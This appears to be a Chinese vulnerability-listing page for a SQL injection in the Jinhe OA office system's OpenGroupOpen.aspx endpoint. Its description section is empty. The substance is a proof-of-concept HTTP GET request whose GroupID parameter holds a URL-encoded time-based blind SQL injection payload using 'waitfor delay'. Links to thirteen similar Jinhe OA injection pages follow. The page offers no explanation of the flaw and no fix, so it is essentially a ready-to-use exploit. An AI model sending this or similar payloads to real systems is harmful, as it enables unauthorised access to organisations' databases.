金和OA OpenGroupOpen.aspx SQL注入漏洞

漏洞描述

PoC代码

GET /c6/Jhsoft.Web.AddMenu/OpenGroupOpen.aspx/?GroupID=%31%27%29%77%61%69%74%66%6f%72%20%64%65%6c%61%79%20%27%30%3a%30%3a%35%27%2d%2d&op=view HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive

相关漏洞推荐

• 金和OA GovDel.aspx SQL注入漏洞
• 金和OA isCheckXml.aspx SQL注入漏洞
• 金和OA getGovAIPDefineType.aspx SQL注入漏洞
• 金和OA GovAIPDefineFileType.aspx SQL注入漏洞
• 金和OA LeaveTypeEdit.aspx SQL注入漏洞
• 金和OA AttendWorkAttendance.aspx SQL注入漏洞
• 金和OA HolidayEdit.aspx SQL注入漏洞
• 金和OA Add_Collection.aspx SQL注入漏洞
• 金和OA LeaveInfo.aspx SQL注入漏洞
• 金和OA DelSelectSummaryIndicators.aspx SQL注入漏洞
• 金和OA OrderDelete.aspx SQL注入漏洞
• 金和OA OrderInfoView.aspx SQL注入漏洞
• 金和OA LinkCharts.aspx SQL注入漏洞